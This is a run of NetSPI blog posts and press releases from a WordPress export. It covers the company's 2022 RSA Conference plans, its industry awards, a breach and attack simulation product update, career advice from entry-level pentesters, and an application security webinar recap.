Having a group of experts throughout the industry under one roof again allows us to exchange ideas on how to better the security community and holistically help our shared client base.” 

Robert Richardson, VP of Enterprise Sales 

“The opportunity to connect face-to-face and spend time with our clients and meet new people is what I’m most excited about. It’s been too long. I’m really glad the turnout is exponentially larger than 2020.” 

Alex Jones, Chief Revenue Officer  

“I’m absolutely most excited about seeing all of our amazing customers. It has been such a long time since our last in-person RSA conference and the event presents such a great opportunity to connect with a high volume of people in such a short time. A huge plus is that we get to enjoy seeing our customers while also doing a lot of events with our NetSPI team. 

From a presentation perspective, I am most intrigued about Bruce Schneier’s keynote, ‘What Matters Most.’ There is so much change occurring at such a rapid pace within our industry that we need to challenge conventional thinking and start trying to solve problems in a different way.” 

Nabil Hannan, Managing Director 

“With the RSA conference being an in-person event this year, I’m most excited to re-connect with people in the industry in person. After two plus years of the pandemic, it’ll be really nice to re-connect with colleagues and catch up in person and learn from them about their current areas of focus, challenges, and the industry trends that they’re observing.” 

What does NetSPI’s recognition as most innovative in pentesting mean to you and what do you think makes NetSPI the most innovative pentesting company? 

Cody Chamberlain, Head of Product  

“It means we’re getting third-party validation of what we already know – that we have the best talent in the industry and the investments we’ve made into our technology are meeting the market’s need of high-touch customer service. As a result, we’re able to identify more vulnerabilities of a higher severity for our clients. 

Our people make NetSPI the most innovative pentesting company. As the person who works everyday building and executing a technology roadmap, that might sound counter intuitive, but I see my job as finding the best ways to scale and maximize the effectiveness of our humans. At the end of the day, humans are the key to our success!” 

Charles Horton, Chief Operating Officer 

“The award is certainly flattering and is really a reflection of the purpose we have as an organization along with our passion and pursuit of excellence. NetSPI has achieved this recognition due to our unwavering commitment to our clients and our team members. Our mission is to combine elite talent and technology to provide a differentiated experience and outcome for our clients, and we take pride in that recognition. This award is based on our work and reputation for things already done, and we will continue to build on this as we go forward.” 

Chad Peterson, Managing Director  

“Winning this awareness is a testament to all the hard work and dedication our teams have put in. From the consultants, technicians, sales, and strategy teams to marketing and leadership – everyone has had their hand in making NetSPI what we are, and it shows in the work that we are being honored for. 

We have some of the most talented penetration testing experts in the industry. Without these people to shape the technology that we leverage –  Resolve, AttackSim, and the Attack Surface Management platform – to streamline our work and allow our pentesting consultants to spend their valuable time identifying, verifying, and providing guidance on how to address findings for our clients, we would not be the company that we are today.”  

Robert Richardson, VP of Enterprise Sales 

“The secret is out. We’ve been delivering game changing quality and consistency for years, so it’s really exciting to see our growth and brand be recognized. 

It’s a combination of our technology, people, and culture – the combination of those things creates consistency and quality in the depth of our services.” 

Alex Jones, Chief Revenue Officer  

“It is tough to truly articulate how much this award means to me. For me, this is the culmination of four years of incredibly hard work, so to see how far we have come as a company but then also be publicly recognized for it is such a testament to what we have accomplished thus far. Frankly, I feel like we are just getting started! I am such a small part in this puzzle, as my four years of hard work pale in comparison to the 10+ years of hard work so many of our technical and thought leaders have put in to build our incredible reputation. 

What makes NetSPI the most innovative in pentesting is our unique combination of industry-leading technical talent, sophisticated use of bleeding edge technology, unrelenting focus on customer experience, and a culture that promotes and rewards the highest levels of moral and ethical standards.” 

Nabil Hannan, Managing Director 

“It’s a true feeling of pride knowing that I am part of an organization that is being recognized for excellence in our space. This award is a great validation of the work we have been doing as a company and that we are truly having an impact on the world of penetration testing.” 

Connect With NetSPI at the 2022 RSA Conference 

It’s clear that the team cannot wait to see many new and familiar faces this week at the conference and discuss how we have seen the industry “transform” over the past two years, and where it’s headed next.  

Book a meeting with us to discuss penetration testing in-depth or explore our other services.

[post_title] => 2022 RSA Conference: What Makes Us the Most Innovative Pentesting Company? [post_excerpt] => Learn what our team is looking forward to most at the 2022 RSA Conference and what being awarded the most innovative penetration testing company means to them. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => rsac-2022-penetration-testing-award [to_ping] => [pinged] => [post_modified] => 2022-06-10 10:25:57 [post_modified_gmt] => 2022-06-10 15:25:57 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27877 [menu_order] => 32 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [7] => WP_Post Object ( [ID] => 27870 [post_author] => 91 [post_date] => 2022-06-06 12:00:00 [post_date_gmt] => 2022-06-06 17:00:00 [post_content] =>
NetSPI honored in the coveted 10th Annual Global InfoSec Awards at the 2022 RSA Conference.

Minneapolis, MNNetSPI, the leader in enterprise penetration testing and attack surface management, was awarded "Most Innovative in Penetration Testing" from Cyber Defense Magazine (CDM), the industry’s leading electronic information security magazine.  

NetSPI represents the key criteria that CDM and the Global InfoSec Award judges look for in cybersecurity winners: understanding tomorrow’s threats, today, and innovating in unexpected ways that can help mitigate cyber risk and get one step ahead of the next breach.  

Traditional pentesting has not kept pace with the realities of business agility and cybercriminal sophistication. NetSPI has revolutionized the Penetration Testing as a Service (PTaaS) delivery model to enable organizations to view penetration testing results in real time, scale to support innovation, orchestrate faster remediation, perform always-on continuous pentesting, and more. 

NetSPI’s Resolve penetration testing platform, backed by its global team of expert pentesters, helps clients improve vulnerability management and remediation processes, better understand and reduce risk, manage the evolving attack surface, and leverages automation to enable manual pentesting to find business critical vulnerabilities that tools alone cannot uncover.  

NetSPI continuously develops new solutions to meet evolving threats – most recently launching attack surface management and announcing enhancements to its breach & attack simulation services

“We’re thrilled to be honored by Cyber Defense Magazine,” said Aaron Shilts, President and CEO of NetSPI. “Our technology-powered services are disrupting the penetration testing industry, and this recognition is a true testament to our global team’s unwavering dedication to delivering world-class penetration testing services.” 

Global Infosec Awards Winner – Cyber Defense Magazine 2022

“NetSPI embodies what we look for in leading innovators within the cybersecurity industry,” said Gary S. Miliefsky, Publisher of Cyber Defense Magazine. “NetSPI’s platform driven, human delivered approach to offensive cybersecurity provides a unique opportunity for organizations to think strategically about their proactive security efforts, instead of viewing penetration testing as a check-the-box activity.” 

For more information on NetSPI, visit the company website or speak with the company’s penetration testing experts at booth #4605 at RSA Conference 2022. Learn more about this year’s Global InfoSec Award winners in this full list here.

 

About NetSPI 

NetSPI is the leader in penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world's five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn

About CDM InfoSec Awards 

This is Cyber Defense Magazine’s tenth year of honoring InfoSec innovators from around the Globe. Our submission requirements are for any startup, early stage, later stage, or public companies in the INFORMATION SECURITY (INFOSEC) space who believe they have a unique and compelling value proposition for their product or service. Learn more at www.cyberdefenseawards.com 

About Cyber Defense Magazine 

Cyber Defense Magazine is the premier source of cyber security news and information for InfoSec professions in business and government. We are managed and published by and for ethical, honest, passionate information security professionals. Our mission is to share cutting-edge knowledge, real-world stories and awards on the best ideas, products and services in the information technology industry.  We deliver electronic magazines every month online for free, and special editions exclusively for the RSA Conferences. CDM is a proud member of the Cyber Defense Media Group. Learn more about us at https://www.cyberdefensemagazine.com and visit https://www.cyberdefensetv.com and https://www.cyberdefenseradio.com to see and hear some of the most informative interviews of many of these winning company executives.  Join a webinar at https://www.cyberdefensewebinars.com and realize that infosec knowledge is power.

NetSPI Media Inquiries
Tori Norris, NetSPI 
victoria.norris@netspi.com
(630) 258-0277 

Amanda Echavarri, Inkhouse for NetSPI 
netspi@inkhouse.com
(978) 201-2510 

CDM Media Inquiries

Contact: Irene Noser, Marketing Executive
Email: marketing@cyberdefensemagazine.com
Toll Free (USA): 1-833-844-9468
International: 1-646-586-9545
Website: www.cyberdefensemagazine.com 

[post_title] => NetSPI Named "Most Innovative in Penetration Testing" in the Global InfoSec Awards [post_excerpt] => Read why NetSPI was selected as the most innovative pentesting company in the 2022 Global InfoSec Awards. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => most-innovative-pentesting-company-global-infosec-awards [to_ping] => [pinged] => [post_modified] => 2022-06-06 10:07:28 [post_modified_gmt] => 2022-06-06 15:07:28 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27870 [menu_order] => 33 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [8] => WP_Post Object ( [ID] => 27843 [post_author] => 91 [post_date] => 2022-06-01 08:00:00 [post_date_gmt] => 2022-06-01 13:00:00 [post_content] =>
Organizations leverage the platform-driven, human-delivered service to measure and continuously improve the efficacy of detective controls and MSSP coverage.

Minneapolis, MNNetSPI, the leader in penetration testing and attack surface management, today announced new Breach and Attack Simulation (BAS) enhancements to meet increased market demand for improved threat detection. With the combination of the AttackSim cloud-native technology platform and hands-on counsel from NetSPI’s expert penetration testing team, organizations can continuously test their detective controls against real-world attack tactics, techniques, and procedures (TTPs). 

According to NetSPI data, only 20% of common attack behaviors are caught by out-of-the-box detective controls (EDR, SIEM, MSSPs) – leaving organizations with a false sense of security. The updates to NetSPI’s Breach and Attack Simulation allow detection engineers to measure their ability to detect common adversary behaviors and ultimately prioritize detection development as well as investments.  

Following the initial collaborative assessment with NetSPI’s experts, the AttackSim technology platform is provided to organizations for continuous testing and improvement. The platform features many new updates including: 

  • Seamless use, regardless of skill level: An enhanced user experience (UX) and a refined user interface (UI) can be used by experts and novices alike.
  • New automated plays and playbooks: Detailed manual procedures for reproducing attacker behavior, as well as consistently updated security playbooks, allow organizations to better strengthen their security posture. With the latest updates, NetSPI has nearly 300 attack plays that can be used to test detective controls.
  • Enhanced reporting: Security teams now have additional data and metrics to work with, such as peer comparison, year-over-year reporting, and telemetry flow analysis. New reports that support programmatic, tactic, technique, and procedure (TTP) summary metrics are also now available.  

“Indicators of Compromise have become less useful as the threat landscape evolves at a breakneck speed,” said Cody Chamberlain, Head of Product at NetSPI. “To stay ahead of malicious actors, organizations must shift their gaze to detect attackers before something bad happens. The NetSPI AttackSim platform, combined with the power of our skilled team of penetration testers, lets organizations continuously simulate real attack behavior, providing better insight into the efficacy of their detective controls.” 

“Small and medium-sized organizations with limited personnel often rely on MSSPs to implement detections and operate similarly to a security operations center (SOC),” said Scott Sutherland, Senior Director, Adversary Simulation and Infrastructure Testing at NetSPI. “We built Breach and Attack Simulation not only to improve detections, but also to enable organizations to validate MSSP coverage and better understand the scope of their agreements.” 

NetSPI will be demoing the AttackSim platform and its new capabilities during RSA Conference 2022 at booth #4605 in the North Expo Exhibit Hall. Schedule a meeting with the team

To learn more about Breach and Attack Simulation, email sales@netspi.com or visit https://www.netspi.com/security-testing/breach-and-attack-simulation/

 

About NetSPI 

NetSPI is the leader in penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn

Media Contacts:
Tori Norris, NetSPI 
victoria.norris@netspi.com 
(630) 258-0277 

Amanda Echavarri, Inkhouse for NetSPI 
netspi@inkhouse.com 
(978) 201-2510 

[post_title] => NetSPI’s New Breach and Attack Simulation Enhancements Help Organizations Achieve Behavior-Based Threat Detection [post_excerpt] => Learn how organizations can leverage breach and attack simulation for continuous detective control reviews, to evaluate MSSP coverage, and improve behavior-based threat detection. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => breach-and-attack-simulation-enhancements-threat-detection [to_ping] => [pinged] => [post_modified] => 2022-05-31 16:25:13 [post_modified_gmt] => 2022-05-31 21:25:13 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27843 [menu_order] => 76 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [9] => WP_Post Object ( [ID] => 27715 [post_author] => 91 [post_date] => 2022-04-28 13:27:28 [post_date_gmt] => 2022-04-28 18:27:28 [post_content] =>
The competitive business awards recognize entrepreneurs and leaders of high-growth companies who think big to succeed

Minneapolis, MN – Ernst & Young LLP (EY US) today announced that Aaron Shilts, CEO and President of NetSPI, was named an Entrepreneur Of The Year® 2022 Heartland Award finalist. He is one of 28 finalists that have been selected by a panel of independent judges based on entrepreneurial spirit, purpose, growth, and impact – among other core contributions and attributes.

“What an honor to be listed next to some of the top business leaders in this region – arguably, some of the best in the country,” said Aaron. “But behind every great leader, is a team of even greater leaders. Without the support of every individual at NetSPI, we would not have achieved the high-growth, success, and innovation that we saw over the past two years. Together we’ve led NetSPI to become THE leader in offensive cybersecurity, helping to secure many of the world’s most prominent organizations.”

Regional award winners will be announced on June 9, 2022, at The Fillmore Minneapolis. The regional winners will then be considered by the National independent judging panel, and National awards will be presented in November at the Strategic Growth Forum®, one of the nation’s most prestigious gatherings of high-growth, market-leading companies. The Entrepreneur Of The Year National Overall Award winner will then move on to compete for the EY World Entrepreneur Of The Year™ Award in June 2023.

“The 2022 Entrepreneur Of The Year finalists have shown us that ambition, courage, ingenuity and empathy are key to driving change,” said Dominic Iannazzo, Heartland Program Co-director. “They have a mindset that drives them to strive for more and an unwavering commitment to their companies, customers and communities.”

For over 35 years, EY US has celebrated the unstoppable entrepreneurs who are building a more equitable, sustainable, and prosperous world for all. The Entrepreneur Of The Year program has recognized more than 10,000 US executives since its inception in 1986.

###

About NetSPI 

NetSPI is the leader in enterprise penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three out of the five FAANG companies, the world’s largest healthcare organizations, the largest global cloud providers, and many of the Fortune® 500. Its platform driven, human delivered Penetration Testing, Adversary Simulation, and Attack Surface Management services are supported by dynamic technology platforms and a dedicated team of global penetration testing experts. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn

About the Sponsors

Entrepreneur Of The Year is the world’s most prestigious business awards program for unstoppable entrepreneurs. These visionary leaders deliver innovation, growth and prosperity that transform our world. The program engages entrepreneurs with insights and experiences that foster growth. It connects them with their peers to strengthen entrepreneurship around the world. Entrepreneur Of The Year is the first and only truly global awards program of its kind.

It celebrates entrepreneurs through regional and national awards programs in more than 145 cities in over 60 countries. National overall winners go on to compete for the EY World Entrepreneur Of The Year™ title. Visit ey.com/us/eoy.

About EY Private

As Advisors to the ambitious™, EY Private professionals possess the experience and passion to support private businesses and their owners in unlocking the full potential of their ambitions. EY Private teams offer distinct insights born from the long EY history of working with business owners and entrepreneurs. These teams support the full spectrum of private enterprises including private capital managers and investors and the portfolio businesses they fund, business owners, family businesses, family offices and entrepreneurs. Visit ey.com/us/private.

About EY

EY exists to build a better working world, helping create long-term value for clients, people and society and build trust in the capital markets.

Enabled by data and technology, diverse EY teams in over 150 countries provide trust through assurance and help clients grow, transform and operate.

Working across assurance, consulting, law, strategy, tax and transactions, EY teams ask better questions to find new answers for the complex issues facing our world today.

EY refers to the global organization, and may refer to one or more, of the member firms of Ernst & Young Global Limited, each of which is a separate legal entity. Ernst & Young Global Limited, a UK company limited by guarantee, does not provide services to clients. Information about how EY collects and uses personal data and a description of the rights individuals have under data protection legislation are available via ey.com/privacy. EY member firms do not practice law where prohibited by local laws. For more information about our organization, please visit ey.com.

Ernst & Young LLP is a client-serving member firm of Ernst & Young Global Limited operating in the US.

Media Contacts:
Tori Norris, NetSPI Director of Brand and Communications
victoria.norris@netspi.com
(630) 258-0277 

Julia Menefee, EY
Julia.Peters@ey.com 
(213) 240-7436

[post_title] => EY Announces NetSPI CEO Aaron Shilts as an Entrepreneur Of The Year® 2022 Heartland Award Finalist  [post_excerpt] => Learn why Aaron Shilts is being recognized as a top Minnesota business leader alongside 28 other leaders and entrepreneurs in the Heartland region. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => ey-entrepreneur-of-the-year-heartland-2022-aaron-shilts [to_ping] => [pinged] => [post_modified] => 2022-04-28 13:27:30 [post_modified_gmt] => 2022-04-28 18:27:30 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27715 [menu_order] => 48 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [10] => WP_Post Object ( [ID] => 27690 [post_author] => 91 [post_date] => 2022-04-26 07:00:00 [post_date_gmt] => 2022-04-26 12:00:00 [post_content] =>

At NetSPI, we invest heavily in our processes and technology to continuously perform high-quality penetration testing services for our clients. But ask any of our clients and they’ll tell you that the greatest quality that sets NetSPI apart from other pentesting vendors is our people – arguably the greatest and most important investment we can make. 

It’s no secret that the cybersecurity and technology industry is experiencing 0% unemployment rates. And the competition is fierce for qualified talent that is not only technical but also understands the implications of cybersecurity. 

Case-in-point: NetSPI recently attended the Secure World Boston cybersecurity event. In one session, the presenter asked the room of more than 50 CISOs and other security leaders to raise their hand if they had open cybersecurity positions that they were struggling to fill. Nearly every single hand went up in the room. 

One way NetSPI is investing and bringing in new and qualified talent is the NetSPI University (NetSPI U) program. This penetration testing training program is specifically for entry-level talent looking to begin their career in cybersecurity.  

Since its inception in 2018, 83% of all NetSPI U “graduates” have continued their careers at NetSPI today – many of which are now in leadership positions. 

This competitive training program is available in Minneapolis, Portland (OR), Lehi, and Pune. You join as an Associate Security Consultant (or remote depending on the situation) and receive hands-on penetration testing training focused on NetSPI’s proven testing methodology. Not to mention the competitive benefits and opportunities to be mentored by some of the best talent in cybersecurity. [To view our open pentesting jobs, visit our careers page] 

To share a first-hand perspective on what it’s like to become a pentester, in this blog, we asked four NetSPI U alumni to share their experiences getting into and working in the pentesting industry.  

What did you wish you knew before you transitioned into cybersecurity? 

Karin Knapp, Security Consultant (NetSPI U Class of 2021): 

“I wish I had known more about a career in cybersecurity while in school. With limited experience in cybersecurity before I applied to NetSPI U, I wish I had taken more electives that would've been more applicable to my current role instead of what I thought I wanted to do before I graduated.”  

Matt Ostrom, Managing Consultant (NetSPI U Class of 2018): 

“Pentesting is a team job. There is no room, nor should there be room for ‘rockstars’.”  

Marissa Allen, Security Consultant II (NetSPI U Class of 2020): 

“I wish I had known more certainly what cybersecurity career path I wanted to take. Everything is interesting, and it can take a while to narrow down your interests in the field given there are so many paths you can take.”  

Sam Horvath, Technical Client Director (NetSPI U Class of 2018): 

“Ignorance is bliss – once you know how insecure most systems are, you’ll be perpetually ‘paranoid’ to some degree.”  

What is one piece of advice you’d give to someone who wants to get started in pentesting? 

Karin: 

 “Take a look at websites designed to help you practice your pentesting skills like PortSwigger, HacktheBox, or TryHackMe. These are great ways to familiarize yourself with the basics of pentesting with hands-on, guided practice.”  

Matt: 

 “Start gathering knowledge however you can. Whether that be through reading books or blogs, setting up your home lab of virtual machines – in a cloud environment or something like VirtualBox – testing vulnerable web applications, etc. Every little bit helps.” 

Marissa:  

 “I think the best advice I can give is don’t be afraid to ask questions. There is a ton of information out there, and it can be difficult to sort through. There are many great sites that you can learn new skills from and people that will be willing to guide you if you reach out.” 

Sam: 

 “Start meditating and/or doing intense cardio daily. Being able to put your brain in a calm space at the end of the day after exhausting your critical thinking/problem-solving centers is the key to rejuvenation and rest.” 

What characteristics make a great pentester? Why? 

Karin: 

 “Having a passion to always want to learn more about cybersecurity and pentesting is probably the best characteristic in my opinion. The ability to get creative and think outside of the box, and to not give up on difficult problems is also super valuable.” 

Matt: 

“First, someone who is determined to succeed. Sometimes, we’ll have to go through 99 different failures on exploiting a vulnerability before finding the one that works. Second, someone who loves learning. The cybersecurity industry is constantly changing and keeping pace with those changes is important. And lastly, someone who genuinely wants to make a difference. The work we do is incredibly important, and I feel like our work matters in keeping our clients safe.” 

Marissa: 

“If you like research, puzzles, and problem solving, then you've got this. You’ll come across areas in your penetration tests where you will need to dig into a problem. If you have an investigative personality, then you have the tenacity to go down the rabbit hole and find out if there is a vulnerability or not.” 

Sam: 

“Perseverance. Cracking the hardest problems and puzzles means you can’t get discouraged easily. 99% of people won’t get it on the first try, and that’s okay.” 

What was the most rewarding/beneficial part of your NetSPI U experience? 

Interested in a pentesting job? Curious about a career at NetSPI? Visit www.netspi.com/careers or email jobs@netspi.com to learn more.
Karin: 

“I realized shortly before NetSPI U that I wanted a career in cybersecurity, but I thought I would have to go back to school to be able to get a job in the field. NetSPI U taught me everything that I needed to know and helped me build a solid foundation to be a successful pentester. In addition, I got to meet some awesome people such as those from my NetSPI U class and people who were my mentors in the program. They are the reason I look forward to coming into the office even a year after I ’graduated’.” 

Matt: 

“NetSPI U gives people the opportunity to break into the cybersecurity industry. The idea/concept of the NetSPI U program is a rarity. Being able to go from having a little bit of cybersecurity experience to feeling like I’m confident and ready to start executing on client projects after the program was, and continues to be, invaluable. Additionally, learning from people who have spent years in the industry was crucial. The depth of knowledge they were able to share during the program is the reason why it keeps succeeding and producing stellar pentesters.”  

Marissa: 

“NetSPI U gave me the knowledge and tools to succeed in my career. The program helps future pentesters succeed in that aspect by pairing them with a seasoned pentester as their mentor to provide guidance and answer any questions. It helped me better understand the breadth of work being performed. The program ultimately enabled me to figure out which direction I wanted to grow in my career.” 

Sam: 

“Learning that I had the ability and the drive to develop and succeed in the information security space was a validation of years of work in learning the basics of computer science. Finding a fantastic set of colleagues to learn, grow, and develop friendships within that process was just a bonus.” 

The Future of Penetration Testing 

A career in cybersecurity is a lucrative and rewarding one to get into in the foreseeable future. As cybercrime continues to be on the rise, companies will only continue to invest in services such as penetration testing. Becoming a pentester is not for the faint of heart, but if you have the perseverance to see a project to the end like how Karin, Matt, Marissa, and Sam described, penetration testing could be for you.

Want more information about NetSPI U?

[post_title] => Getting Started as a Pentester: Cybersecurity Career Q&A [post_excerpt] => NetSPI U alumni share their experience breaking into a career in cybersecurity and advice on how to get started as a pentester. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cybersecurity-career-getting-started-as-a-pentester [to_ping] => [pinged] => [post_modified] => 2022-04-27 16:28:21 [post_modified_gmt] => 2022-04-27 21:28:21 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27690 [menu_order] => 51 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [11] => WP_Post Object ( [ID] => 27576 [post_author] => 91 [post_date] => 2022-03-30 10:49:00 [post_date_gmt] => 2022-03-30 15:49:00 [post_content] =>

On March 30, 2022, NetSPI was featured in the VentureBeat article, What’s Happening in the Attack Surface Market: Mitigating Threats in the Cloud Era. Preview the article below, or read the full article online.

+ + +

For an increasing number of organizations, the explosion in attack surfaces has reached unmanageable levels amid the COVID-19 pandemic and the widespread adoption of cloud services. In fact, research shows seven in 10 organizations have been compromised by an unknown or unmanaged asset. 

As remote working has grown more popular during the pandemic, environments that sprawl across on-premises and cloud environments have expanded enterprise attack surfaces to the point where they can’t be secured through traditional IT security approaches alone.

NetSPI Brings Penetration Testing to the ASM Market 

As the need for ASM solutions increases, many security vendors are beginning to move into the space. One such provider is NetSPI, a penetration testing-as-as-service provider that’s raised $100 million in funding to date, who last month launched a new ASM tool that incorporates human penetration testing.

NetSPI’s solution automatically scans attack surface assets and alerts users to high-risk exposure, while NetSPI’s internal team evaluates the risk posed by discovered issues and provides the organization with guidance on how to remediate them.

The use of human penetration testing is unique in the market, and enables organizations to benefit from automated asset scanning alongside the rich risk insights of an experience penetration testing team, who can identify what threats a risk poses in a way that automated solutions cannot.

[post_title] => VentureBeat: What’s Happening in the Attack Surface Market: Mitigating Threats in the Cloud Era [post_excerpt] => On March 30, 2022, NetSPI was featured in the VentureBeat article, What’s Happening in the Attack Surface Market: Mitigating Threats in the Cloud Era. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => venturebeat-whats-happening-in-the-attack-surface-market [to_ping] => [pinged] => [post_modified] => 2022-03-31 13:50:13 [post_modified_gmt] => 2022-03-31 18:50:13 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27576 [menu_order] => 64 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [12] => WP_Post Object ( [ID] => 27549 [post_author] => 91 [post_date] => 2022-03-29 07:00:00 [post_date_gmt] => 2022-03-29 12:00:00 [post_content] =>

Siloes still exist in cybersecurity, where related functions and activities operate asynchronously with other parts of the organization. This is especially true with application security

Various tests occur throughout the software development life cycle (SDLC), but they often lack context or are not in sync with other security activities, leaving organizations with gaps in coverage and a narrow view of their AppSec program.  

To help change the way we approach application security testing today, three Appsec experts came together to discuss this topic in the webinar, Application Security In Depth: Understanding The Three Layers Of AppSec Testing. In this blog, we’ll share key takeaways from the discussion, which features Moshe Zioni, VP of Security Research at Apiiro; Nabil Hannan, Managing Director at NetSPI; and Samir Sherif, CISO at Imperva. 

Why Context is Key During Application Security Testing 

Contextual data is important. It helps organizations understand their SDLC through a broad lens and assists in prioritization of workflows and next steps. Not all vulnerabilities identified will be fixed immediately, and context is key to remediating those that pose the highest risk to the business first and fastest. 

Moshe shares the following five different contextual triggers security leaders should pay close attention to in the SDLC. 

Five Contextual Triggers to Leverage in the SDLC 

  1. Design: At the design stage, prioritize according to what threat model sessions you’d like to have. If there are several designs going through an agile development life cycle, prioritize that by balancing between the capacity we have as security practitioners to the actual deployment. This stage is also important for triggering contextual compliance review. If something is required for compliance and you didn’t prepare for it, this will costly and difficult to go back and implement. 
  2. Branch: After a pull request, you should have context around the code itself. First, analyze the code. This can be accomplished by a review or any automatic tool to enrich the data and provide us with data for the code itself. Through this context point, you can get multiple triggers according to workflows, how lean you want to get, and what priority you have for the commit itself. If you have a commit, which is highly prioritized in terms of sensitive data or a new developer, these context points create a weighing system to help automate the risk questionnaire and code governance. Once the automation is developed, you’ll have some cadence and governance rules for when to trigger each point instead of triggering everything. 
  3. Repository: At the repository level, you gain context about the repository, what kind of business impacts we will have for the application, what information passes through the application, and who is the customer. These points provide you with a coherent view of what needs to be done to secure your application. This is especially true if you need to have compliance rules. The repository is not to be overlooked and should have triggers and workflows.   
  4. CI/CD: The last point of the coding journey is the CI/CD system, or any integration and deployment processes. CI/CD is fluent, so there will be cycles going on throughout the organization. There should also be a lean and safe process for the CI/CD itself. Integrity and provenance for the CI/CD are important to have in terms of automation – as well as putting in place integration for integrity checks across the CI/CD life cycle. 
  5. Production: Before production, you should have another set of eyes look at the information for anything that looks suspicious. 

Along with the context points and material changes, Moshe explains that “all of this comes together to a create a complete picture and mission, which is an ongoing cycle that doesn’t disrupt and interrupt the deployment process but gives you confidence on what kind of design and code you’re going to push to the cloud.” 

Best Practices for Application Penetration Testing and Secure Code Review 

Many different application security testing activities are completed throughout the SDLC, but penetration testing and secure code review are two of the most common and effective.  

A larger concern, however, is that organizations struggle to optimize the results of these due to a lack of clarity on the results they want to achieve. Below are five best practices organizations can implement to optimize these tests. 

Five Best Practices for Application Penetration Testing 

  1. Determine your business objectives. Organizations need to have a clear understanding of their business objectives and how they will make money. This will aid in building a proper application security roadmap and help organizations allocate resources and identify which areas to focus on. 
  2. Contextualize the vulnerabilities. Don’t just perform a security test, fix the vulnerabilities identified. This means understanding the vulnerabilities, contextualizing them based on the business risks, and figuring out which ones to remediate first.  
  3. Acquire buy-in from finance and risk leadership. Gaining support from finance, the Chief Compliance Officer, and other risk leaders and partners will enable organizations to perform testing on a regular cadence with the appropriate resources and budget for testing. 
  4. Perform proper threat modeling and design level analysis. Then, utilize the results to determine new and creative ways that attackers may be trying to gain access to company-wide assets or software that can’t be derived from regular pentesting. 
  5. Invest in continuous pentesting. Point-in-time testing is no longer sufficient if organizations want to protect their software and assets. Instead, it’s time to invest in continuous pentesting to keep up with the rate of change organizations face today. 

One of the earliest times to detect a vulnerability is when the code is being written. Nabil shared this advice on how to start, “From a secure code review perspective, make sure you start aligning different tooling technology and code review activities with your software development cadence so that they are in lockstep in how they’re performed.” 

Here are six additional best practices for secure code review. 

Six Best Practices When Performing a Secure Code Review 

  1. Don’t get complacent. Organizations should be rotating the people who are reviewing source code over time, so everyone is immersed in devising creative ways to discover and fix vulnerabilities.   
  2. Build a methodology for code review. Create a champions program where developers are being trained to write secure code from the get-go. Then reward them for their efforts.  
  3. Transparency is key. Similar to the pentesting best practice above, organizations need to make sure they’re involving folks in leadership and other areas. This means explaining the need for security testing at the code level and how tooling, manual reviews, and automation are helpful with the development process and help build the software securely. 
  4. Prioritize onboarding and scan frequency. Organizations should be testing the right assets, the right applications, and at the right frequency and key timeframe. 
  5. Provide the proper training: Determine how to deal with the different bugs and vulnerabilities that were discovered. This is where it’s important that developers are equipped with the right training and education to fix these vulnerabilities. Another thing to consider is to gamify training so that folks can consume remediation guidance in bite-sized pieces.  
  6. Measure and Improve: Aim for continuous improvement. To accomplish this, organizations need to ensure they’re capturing key metrics and evaluating remediation rates. Are there vulnerabilities that keep recurring? Are developers writing better quality code over time? Are they able to abstract out certain security controls and put them into a secure development framework to help you reduce the cost, time, and effort it takes to fix the vulnerabilities? 

Want to read more on secure code review? Check out these blog posts: 

Solutions to Consider in the Implementation Journey 

In application security, risk is one of the key drivers in delivering effective solutions for your application security program. “At the end of the day, it’s really about risk. How you manage risk and how you manage resiliency for your solutions. Not only from the AppSec perspective but also from the perspective of running your business and supporting the business that you’re in today,” shared Samir.  

Samir explained that the three biggest drivers for security testing include: 

  • How well am I protecting customer data? 
  • How effectively am I building resilience for the technologies that I am providing as a service to customers? 
  • How well do all the different capabilities from infrastructure security to monitoring solutions interplay with each other in application security? 

What matters most in application security? According to Samir, there isn’t a single solution. We need to have a comprehensive view across the whole environment. Here, Samir shares examples of solution capabilities he recommends that security teams must implement – especially if you are selling or servicing solutions to your customers.  

  • Awareness and Education
  • In-App Protection
